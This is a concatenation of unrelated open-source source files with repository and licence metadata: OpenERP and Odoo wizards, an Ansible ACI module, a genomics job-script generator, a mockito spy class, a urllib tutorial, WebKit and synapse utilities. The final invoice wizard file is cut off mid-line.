# -*- coding: utf-8 -*- ############################################################################## # # OpenERP, Open Source Management Solution # Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>). # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # ############################################################################## import time from openerp.osv import fields, osv class hr_holidays_summary_employee(osv.osv_memory): _name = 'hr.holidays.summary.employee' _description = 'HR Leaves Summary Report By Employee' _columns = { 'date_from': fields.date('From', required=True), 'emp': fields.many2many('hr.employee', 'summary_emp_rel', 'sum_id', 'emp_id', 'Employee(s)'), 'holiday_type': fields.selection([('Approved','Approved'),('Confirmed','Confirmed'),('both','Both Approved and Confirmed')], 'Select Leave Type', required=True) } _defaults = { 'date_from': lambda *a: time.strftime('%Y-%m-01'), 'holiday_type': 'Approved', } def print_report(self, cr, uid, ids, context=None): data = self.read(cr, uid, ids, [], context=context)[0] data['emp'] = context['active_ids'] datas = { 'ids': [], 'model': 'hr.employee', 'form': data } return { 'type': 'ir.actions.report.xml', 'report_name': 'holidays.summary', 'datas': datas, } hr_holidays_summary_employee() # vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
agpl-3.0
rsharris/jun2015lgl
create_script_insert_length_sparse.py
1
17318
#!/usr/bin/env python """ Create a cluster job file to create an average insert length sparsity discriminator track. """ from sys import argv,stdin,stdout,stderr,exit def usage(s=None): message = """ usage: create_script_insert_length_sparse [options] > insert_length_sparse.sh <sub>_<samp>_<type> (required) run descriptor; for example, CS_NORM_PE means subject "CS", sample "NORM", and type "PE"; other filenames can use "{run}" to refer to this string --control=<filename> read control values from a file (see list below) --base=<path> path prefix; other filenames can use "{base}" to refer to this path --chromosomes=<filename> read chromosome names and lengths from a file (default is {base}/data/hg19.chrom_lengths) --blacklist=<filename> (cumulative) track file of blacklist intervals --input=<filename> (required) track file to process --track=<filename> (required) track file to create (default is {base}/tracks/{run}.insert_length.sparse) --tempinput=<filename> temporary file to hold input track file, if needed; only needed if the input track was gzipped (default is {base}/tracks/{run}.insert_length.sparse.scratch) --temp=<filename> temporary file to hold track file, if needed; only needed if --gzip and --bigwig are both used (default is {base}/tracks/{run}.insert_length.sparse.temp) --gzip compress track file --undated don't include today's date in the track name --bigwig[=<filename>] create bigwig file in addition to track file --bigwigchroms=<filename> chromosomes file for bedGraphToBigWig (default is {base}/temp/ucsc.hg19.chrom_lengths) --bigwigurl=<url> url for the bigwig file; this can use {bigwig} for the bigwig filename --bigwiglink=<filename> path at which to create a symbolic link to the bigwig and info files; this can use {bigwig} for the bigwig filename --bigwigposition=<interval> intitial UCSC browser interval for bigwig track --initialize=<text> (cumulative) shell command to add to job beginning "shebang:bash" is mapped "#!/usr/bin/env bash" other commands are copied "as is" values read from control file: avgInsertLen.{run} insert_length_sparse.maskLevel insert_length_sparse.windowLength insert_length_sparse.minLength insert_length_sparse.density insert_length_sparse.densityClip insert_length_sparse.samplingStep""" if (s == None): exit (message) else: exit ("%s%s" % (s,message)) def main(): global basePath,runName global debug bashShebang = "#!/usr/bin/env bash" # parse args runName = None controlFilename = None basePath = None blacklistFilenames = [] inputFilename = None chromsFilename = None trackName = None tempInputFilename = None tempFilename = None gzipOutput = False dateInTrackname = True bigWigFilename = None bigWigChromsFilename = None bigWigUrl = None bigWigLink = None bigWigPosition = None bashInitializers = ["set -eu"] debug = [] for arg in argv[1:]: if ("=" in arg): argVal = arg.split("=",1)[1].strip() if (arg.startswith("--control=")): controlFilename = argVal elif (arg.startswith("--base=")) or (arg.startswith("--basepath=")) or (arg.startswith("--path=")): basePath = argVal elif (arg.startswith("--blacklist=")): blacklistFilenames += [argVal] elif (arg.startswith("--input=")): inputFilename = argVal elif (arg.startswith("--chromosomes=")) or (arg.startswith("--chroms=")): chromsFilename = argVal elif (arg.startswith("--track=")): trackName = argVal elif (arg.startswith("--tempinput=")): tempInputFilename = argVal elif (arg.startswith("--temp=")): tempFilename = argVal elif (arg == "--gzip"): gzipOutput = True elif (arg == "--undated"): dateInTrackname = False elif (arg == "--bigwig"): bigWigFilename = "{track}.bw" elif (arg.startswith("--bigwig=")): bigWigFilename = argVal elif (arg.startswith("--bigwigchromosomes=")) or (arg.startswith("--bigwigchroms=")): bigWigChromsFilename = argVal elif (arg.startswith("--bigwigurl=")) or (arg.startswith("--url=")): bigWigUrl = argVal elif (arg.startswith("--bigwiglink=")) or (arg.startswith("--link=")): bigWigLink = argVal elif (arg.startswith("--bigwigposition=")) or (arg.startswith("--bigwigpos=")): bigWigPosition = argVal elif (arg.startswith("--initialize=")) or (arg.startswith("--init=")): if (argVal == "shebang:bash"): argVal = bashShebang if (argVal == "set -eu"): bashInitializers = [x for x in bashInitializers if (x != "set -eu")] bashInitializers += [argVal] elif (arg == "--debug"): debug += ["debug"] elif (arg.startswith("--debug=")): debug += argVal.split(",") elif (arg.startswith("--")): usage("unrecognized option: %s" % arg) elif (runName == None): fields = arg.split(":",2) if (len(fields) != 3): fields = arg.split("_") if (len(fields) < 3) or (fields[-1] not in ["PE","MP"]): usage("\"%s\" is not a valid run descriptor" % arg) runName = "_".join(fields) else: usage("unrecognized option: %s" % arg) if (runName == None): usage("you have to give me a run descriptor") if (controlFilename == None): usage("you have to give me a control filename") if (inputFilename == None): usage("you have to give me an input track filename") if (chromsFilename == None): chromsFilename = "{base}/data/hg19.chrom_lengths" if (trackName == None): trackName = "{base}/tracks/{run}.insert_length.sparse" if (tempInputFilename == None) and (inputFilename.endswith(".gz")): tempInputFilename = trackName + ".scratch" if (tempFilename == None) and (bigWigFilename != None) and (gzipOutput): tempFilename = trackName + ".temp" if (bigWigFilename != None): if (bigWigChromsFilename == None): bigWigChromsFilename = "{base}/temp/ucsc.hg19.chrom_lengths" if (bigWigUrl == None): usage("you have to give me a url for the bigwig file") trackId = "%s.insert_length.sparse" % runName ########## # perform filename substitution ########## if (basePath == None): basePath = "." elif (basePath.endswith("/")): basePath = basePath[:-1] controlFilename = do_filename_substitutition(controlFilename) chromsFilename = do_filename_substitutition(chromsFilename) # blacklist track names for (ix,blacklistFilename) in enumerate(blacklistFilenames): blacklistFilename = do_filename_substitutition(blacklistFilename) assert (not blacklistFilename.endswith(".gz")) assert (not blacklistFilename.endswith(".gzip")) if (not blacklistFilename.endswith(".dat")): blacklistFilename += ".dat" blacklistFilenames[ix] = blacklistFilename # input track name inputFilename = do_filename_substitutition(inputFilename) gzipInput = False if (inputFilename.endswith(".gz")): gzipInput = True elif (inputFilename.endswith(".gzip")): gzipInput = True elif (not inputFilename.endswith(".dat")): inputFilename += ".dat" # track name trackName = do_filename_substitutition(trackName) trackFilename = trackName if (gzipOutput): if (not trackFilename.endswith(".gz")): trackFilename += ".gz" else: if (not trackFilename.endswith(".dat")): trackFilename += ".dat" if (tempInputFilename != None): tempInputFilename = do_filename_substitutition(tempInputFilename) if (tempFilename != None): tempFilename = do_filename_substitutition(tempFilename) # big wig name if (bigWigFilename != None): bigWigFilename = do_filename_substitutition(bigWigFilename) if ("{track}" in bigWigFilename): trackTemp = trackName if (trackTemp.endswith(".gz")): trackTemp = trackTemp[:-3] elif (trackTemp.endswith(".dat")): trackTemp = trackTemp[:-4] bigWigFilename = bigWigFilename.replace("{track}",trackTemp) if (bigWigFilename.endswith(".bw")): infoFilename = bigWigFilename[:-3] + ".info" else: infoFilename = bigWigFilename + ".info" if (bigWigChromsFilename != None): bigWigChromsFilename = do_filename_substitutition(bigWigChromsFilename) if (bigWigUrl != None): bigWigTemp = bigWigFilename slashIx = bigWigTemp.rfind("/") if (slashIx >= 0): bigWigTemp = bigWigTemp[slashIx+1:] bigWigUrl = bigWigUrl.replace("{bigwig}",bigWigTemp) if (bigWigLink != None): bigWigSave = bigWigLink bigWigTemp = bigWigFilename slashIx = bigWigTemp.rfind("/") if (slashIx >= 0): bigWigTemp = bigWigTemp[slashIx+1:] bigWigLink = bigWigLink.replace("{bigwig}",bigWigTemp) infoTemp = infoFilename slashIx = infoTemp.rfind("/") if (slashIx >= 0): infoTemp = infoTemp[slashIx+1:] infoLink = bigWigSave.replace("{bigwig}",infoTemp) ########## # get values from the control file ########## avgInsertLen = None maskLevel = None windowLength = None minLength = None densityThreshold = None densityClip = None samplingStep = None f = file(controlFilename,"rt") lineNumber = 0 for line in f: lineNumber += 1 line = line.strip() if (line == ""): continue if (line.startswith("#")): continue fields = line.split() assert (len(fields) >= 3), \ "not enough fields at control file line %d (%d, expected at least 3)" \ % (lineNumber,len(fields)) assert (fields[1] == "="), \ "can't understand control file line %d:\n%s" \ % (lineNumber,line) (name,_,val) = fields[:3] if (name == "avgInsertLen." + runName): avgInsertLen = int(val) if (name == "insert_length_sparse.maskLevel"): maskLevel = val if (name == "insert_length_sparse.windowLength"): windowLength = int(val) if (name == "insert_length_sparse.minLength"): minLength = int(val) if (name == "insert_length_sparse.density"): densityThreshold = val if (name == "insert_length_sparse.densityClip"): densityClip = val if (name == "insert_length_sparse.samplingStep"): samplingStep = int(val) f.close() if (windowLength == None): windowLength = minLength if (avgInsertLen == None): assert(False), "control file lacks avgInsertLen" if (windowLength == None): assert(False), "control file lacks windowLength" if (minLength == None): assert(False), "control file lacks minLength" if (densityThreshold == None): assert(False), "control file lacks density" if (densityClip == None): assert(False), "control file lacks density clip" if (samplingStep == None): assert(False), "control filelacks samplingStep" if (blacklistFilenames != []): if (maskLevel == None): assert(False), "control file lacks maskLevel" if ("." in maskLevel): while (maskLevel.endswith("0")): maskLevel = maskLevel[:-1] if (maskLevel.endswith(".")): maskLevel = maskLevel[:-1] if ("." in densityThreshold): while (densityThreshold.endswith("0")): densityThreshold = densityThreshold[:-1] if (densityThreshold.endswith(".")): densityThreshold = densityThreshold[:-1] if ("." in densityClip): while (densityClip.endswith("0")): densityClip = densityClip[:-1] if (densityClip.endswith(".")): densityClip = densityClip[:-1] ########## # create the job's shell script ########## # write bash intitializers if (bashInitializers != None): for (ix,bashInitializer) in enumerate(bashInitializers): if (bashInitializer != bashShebang): continue print bashInitializer bashInitializers[ix] = None for (ix,bashInitializer) in enumerate(bashInitializers): if (bashInitializer != "set -eu"): continue print bashInitializer bashInitializers[ix] = None for bashInitializer in bashInitializers: if (bashInitializer == None): continue print do_filename_substitutition(bashInitializer) print if (dateInTrackname): print "today=`today {mmm}/{d}/{yyyy}`" # write commands describing the files the script will create if (tempInputFilename != None): print "echo \"will use %s as a temporary input file\"" % tempInputFilename if (tempFilename != None): print "echo \"will write temporary files to %s\"" % tempFilename print "echo \"will write track file to %s\"" % trackFilename if (bigWigFilename != None): print "echo \"will write bigwig file to %s\"" % bigWigFilename # write command(s) to create track file print print "echo \"=== creating track %s ===\"" % trackId if (gzipInput): commands = [] command = ["time gzip -dc %s" % inputFilename] commands += [command] command = ["> %s" % tempInputFilename] commands += [command] print print commands_to_pipeline(commands) trackSourceFilename = tempInputFilename else: trackSourceFilename = inputFilename commands = [] command = ["time genodsp"] command += ["--chromosomes=%s" % chromsFilename] command += ["--show:uncovered"] command += ["= input %s --missing=-inf" % trackSourceFilename] command += ["= addconst %s" % avgInsertLen] command += ["= slidingsum W=%d D=W" % windowLength] if (blacklistFilenames != []): command += ["= percentile %s W=%d --min=1/inf --quiet" % (maskLevel,samplingStep)] command += ["= input %s --missing=-inf" % trackSourceFilename] command += ["= addconst %s" % avgInsertLen] command += ["= slidingsum W=%d D=W" % windowLength] command += ["= percentile %s,%s W=%d --min=1/inf --quiet" \ % (densityClip,densityThreshold,samplingStep)] if (gzipInput): command += ["= input %s --missing=-inf --destroy" % trackSourceFilename] else: command += ["= input %s --missing=-inf" % trackSourceFilename] command += ["= addconst %s" % avgInsertLen] command += ["= clip --min=percentile%s" % densityClip] for blacklistFilename in blacklistFilenames: command += ["= mask %s --mask=percentile%s" % (blacklistFilename,maskLevel)] command += ["= anticlump --average=percentile%s L=%d" \ % (densityThreshold,minLength)] for blacklistFilename in blacklistFilenames: command += ["= mask %s --mask=0" % blacklistFilename] commands += [command] if (gzipOutput): if (tempFilename != None): command = ["tee %s" % tempFilename] commands += [command] command = ["gzip"] commands += [command] command = ["> %s" % trackFilename] commands += [command] print print commands_to_pipeline(commands) # write command(s) to convert track file to bigwig if (bigWigFilename != None): print print "echo \"=== converting track %s to bigwig ===\"" % trackId if (tempFilename != None): trackInput = tempFilename else: trackInput = trackFilename commands = [] command = ["time bedGraphToBigWig"] command += [trackInput] command += [bigWigChromsFilename] command += [bigWigFilename] commands += [command] print print commands_to_pipeline(commands) if (tempFilename != None): commands = [] command = ["rm %s" % tempFilename] commands += [command] print print commands_to_pipeline(commands) description = "sparse intervals in average insert lengths" if (dateInTrackname): description += " (${today})" commands = [] command = ["make_bigwig_info"] command += ["--url=%s" % bigWigUrl] command += ["--name=\"%s insert lengths sparse\"" % runName] command += ["--desc=\"%s %s\"" % (runName,description)] command += ["--autoscale=\"on\""] command += ["--alwayszero=\"on\""] command += ["--maxheight=\"10:10:10\""] command += ["--color=250,30,100"] if (bigWigPosition != None): command += ["--pos=\"%s\"" % bigWigPosition] command += ["> %s" % infoFilename] commands += [command] print print commands_to_pipeline(commands) if (bigWigLink != None): print print "rm -f %s" % infoLink print "ln -s %s %s" % (infoFilename,infoLink) print "rm -f %s" % bigWigLink print "ln -s %s %s" % (bigWigFilename,bigWigLink) infoUrl = bigWigUrl slashIx = infoUrl.rfind("/") if (slashIx >= 0): infoUrl = infoUrl[:slashIx] infoTemp = infoFilename slashIx = infoTemp.rfind("/") if (slashIx >= 0): infoTemp = infoTemp[slashIx+1:] infoUrl = infoUrl + "/" + infoTemp print >>stderr, infoUrl print print "echo \"track URL is %s\"" % (infoUrl) def commands_to_pipeline(commands): pipeline = [] for (cmdNum,cmd) in enumerate(commands): if (cmdNum == 0): prefix = "" else: prefix = " | " if (cmd[0].startswith(">")): assert (cmdNum != 0) assert (len(cmd) == 1) prefix = " " pipeline += [prefix + cmd[0]] for line in cmd[1:]: pipeline += [" " + line] return " \\\n".join(pipeline) def do_filename_substitutition(s): if ("{base}" in s): assert (basePath != None) s = s.replace("{base}",basePath) if ("{run}" in s): assert (runName != None) s = s.replace("{run}",runName) return s if __name__ == "__main__": main()
gpl-3.0
gaddman/ansible
lib/ansible/modules/network/aci/aci_contract_subject_to_filter.py
2
9063
#!/usr/bin/python # -*- coding: utf-8 -*- # GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt) from __future__ import absolute_import, division, print_function __metaclass__ = type ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ['preview'], 'supported_by': 'certified'} DOCUMENTATION = r''' --- module: aci_contract_subject_to_filter short_description: Bind Contract Subjects to Filters (vz:RsSubjFiltAtt) description: - Bind Contract Subjects to Filters on Cisco ACI fabrics. notes: - The C(tenant), C(contract), C(subject), and C(filter_name) must exist before using this module in your playbook. The M(aci_tenant), M(aci_contract), M(aci_contract_subject), and M(aci_filter) modules can be used for these. seealso: - module: aci_tenant - module: aci_contract - module: aci_contract_subject - module: aci_filter - name: APIC Management Information Model reference description: More information about the internal APIC class B(vz:RsSubjFiltAtt). link: https://developer.cisco.com/docs/apic-mim-ref/ author: - Jacob McGill (@jmcgill298) version_added: '2.4' options: contract: description: - The name of the contract. aliases: [ contract_name ] filter: description: - The name of the Filter to bind to the Subject. aliases: [ filter_name ] log: description: - Determines if the binding should be set to log. - The APIC defaults to C(none) when unset during creation. choices: [ log, none ] aliases: [ directive ] subject: description: - The name of the Contract Subject. aliases: [ contract_subject, subject_name ] state: description: - Use C(present) or C(absent) for adding or removing. - Use C(query) for listing an object or multiple objects. choices: [ absent, present, query ] default: present tenant: description: - The name of the tenant. required: yes aliases: [ tenant_name ] extends_documentation_fragment: aci ''' EXAMPLES = r''' - name: Add a new contract subject to filer binding aci_contract_subject_to_filter: host: apic username: admin password: SomeSecretPassword tenant: production contract: web_to_db subject: test filter: '{{ filter }}' log: '{{ log }}' state: present delegate_to: localhost - name: Remove an existing contract subject to filter binding aci_contract_subject_to_filter: host: apic username: admin password: SomeSecretPassword tenant: production contract: web_to_db subject: test filter: '{{ filter }}' log: '{{ log }}' state: present delegate_to: localhost - name: Query a specific contract subject to filter binding aci_contract_subject_to_filter: host: apic username: admin password: SomeSecretPassword tenant: production contract: web_to_db subject: test filter: '{{ filter }}' state: query delegate_to: localhost register: query_result - name: Query all contract subject to filter bindings aci_contract_subject_to_filter: host: apic username: admin password: SomeSecretPassword tenant: production contract: web_to_db subject: test state: query delegate_to: localhost register: query_result ''' RETURN = r''' current: description: The existing configuration from the APIC after the module has finished returned: success type: list sample: [ { "fvTenant": { "attributes": { "descr": "Production environment", "dn": "uni/tn-production", "name": "production", "nameAlias": "", "ownerKey": "", "ownerTag": "" } } } ] error: description: The error information as returned from the APIC returned: failure type: dict sample: { "code": "122", "text": "unknown managed object class foo" } raw: description: The raw output returned by the APIC REST API (xml or json) returned: parse error type: string sample: '<?xml version="1.0" encoding="UTF-8"?><imdata totalCount="1"><error code="122" text="unknown managed object class foo"/></imdata>' sent: description: The actual/minimal configuration pushed to the APIC returned: info type: list sample: { "fvTenant": { "attributes": { "descr": "Production environment" } } } previous: description: The original configuration from the APIC before the module has started returned: info type: list sample: [ { "fvTenant": { "attributes": { "descr": "Production", "dn": "uni/tn-production", "name": "production", "nameAlias": "", "ownerKey": "", "ownerTag": "" } } } ] proposed: description: The assembled configuration from the user-provided parameters returned: info type: dict sample: { "fvTenant": { "attributes": { "descr": "Production environment", "name": "production" } } } filter_string: description: The filter string used for the request returned: failure or debug type: string sample: ?rsp-prop-include=config-only method: description: The HTTP method used for the request to the APIC returned: failure or debug type: string sample: POST response: description: The HTTP response from the APIC returned: failure or debug type: string sample: OK (30 bytes) status: description: The HTTP status from the APIC returned: failure or debug type: int sample: 200 url: description: The HTTP url used for the request to the APIC returned: failure or debug type: string sample: https://10.11.12.13/api/mo/uni/tn-production.json ''' from ansible.module_utils.network.aci.aci import ACIModule, aci_argument_spec from ansible.module_utils.basic import AnsibleModule def main(): argument_spec = aci_argument_spec() argument_spec.update( contract=dict(type='str', aliases=['contract_name']), # Not required for querying all objects filter=dict(type='str', aliases=['filter_name']), # Not required for querying all objects log=dict(tyep='str', choices=['log', 'none'], aliases=['directive']), subject=dict(type='str', aliases=['contract_subject', 'subject_name']), # Not required for querying all objects tenant=dict(type='str', aliases=['tenant_name']), # Not required for querying all objects state=dict(type='str', default='present', choices=['absent', 'present', 'query']), ) module = AnsibleModule( argument_spec=argument_spec, supports_check_mode=True, required_if=[ ['state', 'absent', ['contract', 'filter', 'subject', 'tenant']], ['state', 'present', ['contract', 'filter', 'subject', 'tenant']], ], ) contract = module.params['contract'] filter_name = module.params['filter'] log = module.params['log'] subject = module.params['subject'] tenant = module.params['tenant'] state = module.params['state'] # Add subject_filter key to modul.params for building the URL module.params['subject_filter'] = filter_name # Convert log to empty string if none, as that is what API expects. An empty string is not a good option to present the user. if log == 'none': log = '' aci = ACIModule(module) aci.construct_url( root_class=dict( aci_class='fvTenant', aci_rn='tn-{0}'.format(tenant), module_object=tenant, target_filter={'name': tenant}, ), subclass_1=dict( aci_class='vzBrCP', aci_rn='brc-{0}'.format(contract), module_object=contract, target_filter={'name': contract}, ), subclass_2=dict( aci_class='vzSubj', aci_rn='subj-{0}'.format(subject), module_object=subject, target_filter={'name': subject}, ), subclass_3=dict( aci_class='vzRsSubjFiltAtt', aci_rn='rssubjFiltAtt-{0}'.format(filter_name), module_object=filter_name, target_filter={'tnVzFilterName': filter_name}, ), ) aci.get_existing() if state == 'present': aci.payload( aci_class='vzRsSubjFiltAtt', class_config=dict( tnVzFilterName=filter_name, directives=log, ), ) aci.get_diff(aci_class='vzRsSubjFiltAtt') aci.post_config() elif state == 'absent': aci.delete_config() # Remove subject_filter used to build URL from module.params module.params.pop('subject_filter') aci.exit_json() if __name__ == "__main__": main()
gpl-3.0
alistair-broomhead/robotframework-selenium2library
test/lib/mockito/spying.py
70
1062
#!/usr/bin/env python # coding: utf-8 '''Spying on real objects.''' from invocation import RememberedProxyInvocation, VerifiableInvocation from mocking import TestDouble __author__ = "Serhiy Oplakanets <[email protected]>" __copyright__ = "Copyright 2009-2010, Mockito Contributors" __license__ = "MIT" __maintainer__ = "Mockito Maintainers" __email__ = "[email protected]" __all__ = ['spy'] def spy(original_object): return Spy(original_object) class Spy(TestDouble): strict = True # spies always have to check if method exists def __init__(self, original_object): self.original_object = original_object self.invocations = [] self.verification = None def __getattr__(self, name): if self.verification: return VerifiableInvocation(self, name) else: return RememberedProxyInvocation(self, name) def remember(self, invocation): self.invocations.insert(0, invocation) def pull_verification(self): v = self.verification self.verification = None return v
apache-2.0
michaelliao/learn-python3
samples/commonlib/use_urllib.py
20
2195
#!/usr/bin/env python3 # -*- coding: utf-8 -*- from urllib import request, parse # get: with request.urlopen('https://api.douban.com/v2/book/2129650') as f: data = f.read() print('Status:', f.status, f.reason) for k, v in f.getheaders(): print('%s: %s' % (k, v)) print('Data:', data.decode('utf-8')) # advanced get: req = request.Request('http://www.douban.com/') req.add_header('User-Agent', 'Mozilla/6.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/8.0 Mobile/10A5376e Safari/8536.25') with request.urlopen(req) as f: print('Status:', f.status, f.reason) for k, v in f.getheaders(): print('%s: %s' % (k, v)) print('Data:', f.read().decode('utf-8')) # post: print('Login to weibo.cn...') email = input('Email: ') passwd = input('Password: ') login_data = parse.urlencode([ ('username', email), ('password', passwd), ('entry', 'mweibo'), ('client_id', ''), ('savestate', '1'), ('ec', ''), ('pagerefer', 'https://passport.weibo.cn/signin/welcome?entry=mweibo&r=http%3A%2F%2Fm.weibo.cn%2F%3Fjumpfrom%3Dweibocom&jumpfrom=weibocom') ]) req = request.Request('https://passport.weibo.cn/sso/login') req.add_header('Origin', 'https://passport.weibo.cn') req.add_header('User-Agent', 'Mozilla/6.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/8.0 Mobile/10A5376e Safari/8536.25') req.add_header('Referer', 'https://passport.weibo.cn/signin/login?entry=mweibo&res=wel&wm=3349&r=http%3A%2F%2Fm.weibo.cn%2F%3Fjumpfrom%3Dweibocom') with request.urlopen(req, data=login_data.encode('utf-8')) as f: print('Status:', f.status, f.reason) for k, v in f.getheaders(): print('%s: %s' % (k, v)) print('Data:', f.read().decode('utf-8')) # with proxy and proxy auth: proxy_handler = urllib.request.ProxyHandler({'http': 'http://www.example.com:3128/'}) proxy_auth_handler = urllib.request.ProxyBasicAuthHandler() proxy_auth_handler.add_password('realm', 'host', 'username', 'password') opener = urllib.request.build_opener(proxy_handler, proxy_auth_handler) with opener.open('http://www.example.com/login.html') as f: pass
gpl-2.0
dongritengfei/phantomjs
src/qt/qtwebkit/Tools/QueueStatusServer/model/activeworkitems.py
140
3975
# Copyright (C) 2010 Google Inc. All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of Google Inc. nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. from google.appengine.ext import db from datetime import timedelta, datetime import time from model.queuepropertymixin import QueuePropertyMixin class ActiveWorkItems(db.Model, QueuePropertyMixin): queue_name = db.StringProperty() item_ids = db.ListProperty(int) item_dates = db.ListProperty(float) date = db.DateTimeProperty(auto_now_add=True) # The id/date pairs should probably just be their own class. def _item_time_pairs(self): return zip(self.item_ids, self.item_dates) def _set_item_time_pairs(self, pairs): if pairs: # The * operator raises on an empty list. # db.Model does not tuples, we have to make lists. self.item_ids, self.item_dates = map(list, zip(*pairs)) else: self.item_ids = [] self.item_dates = [] def _append_item_time_pair(self, pair): self.item_ids.append(pair[0]) self.item_dates.append(pair[1]) def _remove_item(self, item_id): nonexpired_pairs = [pair for pair in self._item_time_pairs() if pair[0] != item_id] self._set_item_time_pairs(nonexpired_pairs) @classmethod def key_for_queue(cls, queue_name): return "active-work-items-%s" % (queue_name) @classmethod def lookup_by_queue(cls, queue_name): return cls.get_or_insert(key_name=cls.key_for_queue(queue_name), queue_name=queue_name) @staticmethod def _expire_item(key, item_id): active_work_items = db.get(key) active_work_items._remove_item(item_id) active_work_items.put() def expire_item(self, item_id): return db.run_in_transaction(self._expire_item, self.key(), item_id) def deactivate_expired(self, now): one_hour_ago = time.mktime((now - timedelta(minutes=60)).timetuple()) nonexpired_pairs = [pair for pair in self._item_time_pairs() if pair[1] > one_hour_ago] self._set_item_time_pairs(nonexpired_pairs) def next_item(self, work_item_ids, now): for item_id in work_item_ids: if item_id not in self.item_ids: self._append_item_time_pair([item_id, time.mktime(now.timetuple())]) return item_id return None def time_for_item(self, item_id): for active_item_id, time in self._item_time_pairs(): if active_item_id == item_id: return datetime.fromtimestamp(time) return None
bsd-3-clause
ritzk/ansible-modules-core
utilities/logic/fail.py
198
1458
#!/usr/bin/python # -*- coding: utf-8 -*- # Copyright 2012 Dag Wieers <[email protected]> # # This file is part of Ansible # # Ansible is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # Ansible is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with Ansible. If not, see <http://www.gnu.org/licenses/>. DOCUMENTATION = ''' --- module: fail short_description: Fail with custom message description: - This module fails the progress with a custom message. It can be useful for bailing out when a certain condition is met using C(when). version_added: "0.8" options: msg: description: - The customized message used for failing execution. If omitted, fail will simple bail out with a generic message. required: false default: "'Failed as requested from task'" author: "Dag Wieers (@dagwieers)" ''' EXAMPLES = ''' # Example playbook using fail and when together - fail: msg="The system may not be provisioned according to the CMDB status." when: cmdb_status != "to-be-staged" '''
gpl-3.0
vivisect/synapse
synapse/tools/pushfile.py
1
1334
import os import sys import argparse import synapse.telepath as s_telepath import synapse.lib.output as s_output def getArgParser(): p = argparse.ArgumentParser() p.add_argument('cortex', help='telepath URL for a target cortex') p.add_argument('filenames', nargs='+', help='files to upload') p.add_argument('--tags', help='comma separated list of tags to add to the nodes') return p def main(argv, outp=None): if outp is None: # pragma: no cover outp = s_output.OutPut() p = getArgParser() opts = p.parse_args(argv) core = s_telepath.openurl(opts.cortex) tags = [] if opts.tags: for tag in opts.tags.split(','): tags.append(tag) if tags: outp.printf('adding tags: %r' % (tags,)) for path in opts.filenames: with open(path, 'rb') as fd: base = os.path.basename(path) node = core.formNodeByFd(fd, name=base) core.addTufoTags(node, tags) iden = node[1].get('file:bytes') size = node[1].get('file:bytes:size') name = node[1].get('file:bytes:name') outp.printf('file: %s (%d) added (%s) as %s' % (base, size, iden, name)) core.fini() # Shut down the proxy if __name__ == '__main__': # pragma: no cover sys.exit(main(sys.argv[1:]))
apache-2.0
StefanRijnhart/odoomrp-wip
account_treasury_forecast/wizard/wiz_create_invoice.py
31
2577
# -*- encoding: utf-8 -*- ############################################################################## # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU Affero General Public License as # published by the Free Software Foundation, either version 3 of the # License, or (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Affero General Public License for more details. # # You should have received a copy of the GNU Affero General Public License # along with this program. If not, see http://www.gnu.org/licenses/. # ############################################################################## import openerp.addons.decimal_precision as dp from openerp import models, fields, api class WizCreateInvoice(models.TransientModel): _name = 'wiz.create.invoice' _description = 'Wizard to create invoices' partner_id = fields.Many2one("res.partner", string="Partner") journal_id = fields.Many2one("account.journal", string="Journal", domain=[("type", "=", "purchase")]) description = fields.Char(string="Description") amount = fields.Float(string="Amount", digits_compute=dp.get_precision('Account')) line_id = fields.Many2one("account.treasury.forecast.line.template", string="Payment") @api.one def button_create_inv(self): invoice_obj = self.env['account.invoice'] res_inv = invoice_obj.onchange_partner_id('in_invoice', self.partner_id.id) values = res_inv['value'] values['name'] = ('Treasury: ' + self.description + '/ Amount: ' + str(self.amount)) values['reference'] = ('Treasury: ' + self.description + '/ Amount: 